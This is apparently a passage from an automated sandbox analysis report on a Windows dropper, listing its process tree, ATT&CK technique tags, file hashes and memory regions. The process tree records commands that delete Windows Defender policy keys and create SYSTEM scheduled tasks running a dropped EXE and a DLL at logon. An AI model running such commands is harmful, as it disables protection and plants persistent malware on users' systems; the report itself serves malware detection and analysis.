                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1896
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1464
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                        3⤵
                                          PID:2788
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                            4⤵
                                              PID:2124
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 09:28:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\pliIlCR.exe\" 18 /site_id 525403 /S" /V1 /F
                                            3⤵
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2784
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn "MFUxwpyluZmBswWip"
                                            3⤵
                                              PID:1540
                                          • C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\pliIlCR.exe
                                            C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\pliIlCR.exe 18 /site_id 525403 /S
                                            2⤵
                                            • Executes dropped EXE
                                            • Drops file in System32 directory
                                            • Drops file in Program Files directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2892
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1180
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2092
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:584
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2956
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:380
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\EZDglW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F
                                              3⤵
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:916
                                        • C:\Windows\system32\gpscript.exe
                                          gpscript.exe /RefreshSystemParam
                                          1⤵
                                            PID:1700
                                          • C:\Windows\system32\gpscript.exe
                                            gpscript.exe /RefreshSystemParam
                                            1⤵
                                              PID:2312
                                            • C:\Windows\system32\gpscript.exe
                                              gpscript.exe /RefreshSystemParam
                                              1⤵
                                                PID:1804

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                Filesize

                                                1.1MB

                                                MD5

                                                634a1554086401816c2ca9b62382aeed

                                                SHA1

                                                669f0e3a78b9f47f333d07f63973271039805dfb

                                                SHA256

                                                2377471550fa6f8b1c1f0da5450b8ba8869ddedab8fb88d9a061f9a8a96e7508

                                                SHA512

                                                c1d01aae2251693423c06f4141a20a44d5b9c5753f59ae98d4e9ab0b00e8ab04ba1c68336d1b19afbf1560c3f8d46b7764382cc507dab62f5dbef05caa49522d

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                Filesize

                                                7KB

                                                MD5

                                                6fe0989b2c565d81fd63cf81423b1921

                                                SHA1

                                                7a0ef8d5bf960ed2b8f7f53fb80ffd285cefb2ef

                                                SHA256

                                                2c0fa65644a54bcab8797226219f37da2c8d1ad3661a3771b9d55aca6c8cb188

                                                SHA512

                                                1b80bc41f72c9ef3d91d55375ecc6e56bea69d958b16474489bf2120c3ff3e18acd1ecc14bdba92336d0ee176c0741c088b36788e6d5eecaab16add72054db6f

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                Filesize

                                                7KB

                                                MD5

                                                88ce4eeb9d60c096333fc1875eecb109

                                                SHA1

                                                eea468f34ee483b9a3456d79cab66b321f2cc9b8

                                                SHA256

                                                345789691ad9ffed2737a6639d8a8f6c7f0a3cef8de385f27584085e12cadaad

                                                SHA512

                                                0ea1203ca144e05e79cf2fcfacbcf718a272109d3aa82a8667b7ac7f1e7bb4f0307293167d6469c890564107429148c60b812edae42458fcf649a1dd866103fc

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                Filesize

                                                7KB

                                                MD5

                                                b47729fd7a0bae786ae8ef1134f9ecf0

                                                SHA1

                                                cfe6c82703c1471edb63659e80e887db99430bd7

                                                SHA256

                                                0774e2dabf3da908961e25bf4e7bc7cc55577ac06420106c3d9c82ecc5042a93

                                                SHA512

                                                3683c379a4c336849984380aec46d43ce658b44634378051eaa719f93b5e9394df2a2fd847666eb355fe8341c068cd9ce249fa59c7c5062fbb3bd3d4c399c711

                                              • C:\Windows\Temp\YSrBLfWUtIHnuviW\GOxewzDU\PhwlcspWuijIbpFS.wsf

                                                Filesize

                                                8KB

                                                MD5

                                                e6611963360465a3bd8d3fb4ad12c3cb

                                                SHA1

                                                5a1767cf296ccd9dba0a6e63ee3c4e51f73ecc9e

                                                SHA256

                                                d65493aa306781dd9c28d4afa3f3ccf27c72a42fcb224d01a3ed684591e9e60d

                                                SHA512

                                                31678056736846b156c52fea9630616d485b5ed24c21d0477c788566377a5481bf362bfc1d5f364c60d293cfe02a3be1822ad66bc6402fdfb09ec80f5a95a3d1

                                              • C:\Windows\system32\GroupPolicy\gpt.ini

                                                Filesize

                                                268B

                                                MD5

                                                a62ce44a33f1c05fc2d340ea0ca118a4

                                                SHA1

                                                1f03eb4716015528f3de7f7674532c1345b2717d

                                                SHA256

                                                9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                SHA512

                                                9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                              • \??\PIPE\srvsvc

                                                MD5

                                                d41d8cd98f00b204e9800998ecf8427e

                                                SHA1

                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                SHA256

                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                SHA512

                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                              • \Users\Admin\AppData\Local\Temp\7zSEFAC.tmp\Install.exe

                                                Filesize

                                                6.3MB

                                                MD5

                                                ded964e022a37d93d434091ec75f9881

                                                SHA1

                                                e89a551ac1f19dc3838e21157667e2f98d84d06b

                                                SHA256

                                                9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde

                                                SHA512

                                                13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af

                                              • \Users\Admin\AppData\Local\Temp\7zSF41F.tmp\Install.exe

                                                Filesize

                                                6.8MB

                                                MD5

                                                6cb87a9fc7dc1f2a5410fd428f5460f0

                                                SHA1

                                                2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

                                                SHA256

                                                fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

                                                SHA512

                                                4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

                                              • memory/1792-49-0x000000001B640000-0x000000001B922000-memory.dmp

                                                Filesize

                                                2.9MB

                                              • memory/1792-50-0x0000000002320000-0x0000000002328000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/2268-31-0x0000000002A80000-0x0000000002A88000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/2268-30-0x000000001B650000-0x000000001B932000-memory.dmp

                                                Filesize

                                                2.9MB

                                              • memory/2456-52-0x0000000076DA0000-0x0000000076E9A000-memory.dmp

                                                Filesize

                                                1000KB

                                              • memory/2456-51-0x0000000076EA0000-0x0000000076FBF000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/2700-61-0x000000001B6B0000-0x000000001B992000-memory.dmp

                                                Filesize

                                                2.9MB

                                              • memory/2700-62-0x0000000002770000-0x0000000002778000-memory.dmp

                                                Filesize

                                                32KB

                                              • memory/2816-23-0x0000000010000000-0x0000000010B5D000-memory.dmp

                                                Filesize

                                                11.4MB

                                              • memory/2892-88-0x0000000002F70000-0x0000000002FF5000-memory.dmp

                                                Filesize

                                                532KB